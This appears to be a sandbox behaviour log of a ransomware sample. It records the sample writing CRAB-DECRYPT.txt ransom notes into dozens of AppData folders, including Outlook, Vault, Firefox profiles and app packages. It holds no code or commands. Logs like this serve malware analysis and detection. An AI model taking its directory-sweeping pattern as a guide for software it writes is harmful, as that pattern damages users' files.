Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\setup\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\setup\logs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\StandaloneUpdater\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Outlook\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Outlook\gliding\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\PlayReady\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\PlayReady\Internet Explorer\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\PlayReady\Internet Explorer\Desktop\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Publisher\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\TaskSchedulerConfig\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Vault\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Vault\UserProfileRoaming\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Live\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Live\Bici\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\settings.ini desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft Help\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\MicrosoftEdge\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\MicrosoftEdge\SharedCacheContainers\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\MicrosoftEdge\SharedCacheContainers\MicrosoftEdge_bingpagedata\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\MicrosoftEdge\SharedCacheContainers\MicrosoftEdge_iecompat\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\MicrosoftEdge\SharedCacheContainers\MicrosoftEdge_iecompatua\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\MicrosoftEdge\SharedCacheContainers\MicrosoftEdge_ieflipahead\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\MicrosoftEdge\User\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\MicrosoftEdge\User\Default\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft_Corporation\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft_Corporation\powershell_ise.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\i6gc44p4.default\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\9E2F88E3.Twitter_wgeqdkkx372wm\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\king.com.CandyCrushSodaSaga_kgqvnymyfvs32\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.3DBuilder_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Appconnector_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.BingFinance_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.BingNews_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.BingSports_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.CommsPhone_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.LockApp_cw5n1h2txyewy\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Messaging_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.NET.Native.Framework.1.6_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.NET.Native.Runtime.1.6_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Office.Sway_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.People_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Services.Store.Engagement_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.SkypeApp_kzf8qxf38zg5c\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.WindowsCamera_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.WindowsFeedback_cw5n1h2txyewy\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.WindowsMaps_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.WindowsPhone_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.XboxApp_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Windows.ContactSupport_cw5n1h2txyewy\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\windows.devicesflow_cw5n1h2txyewy\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
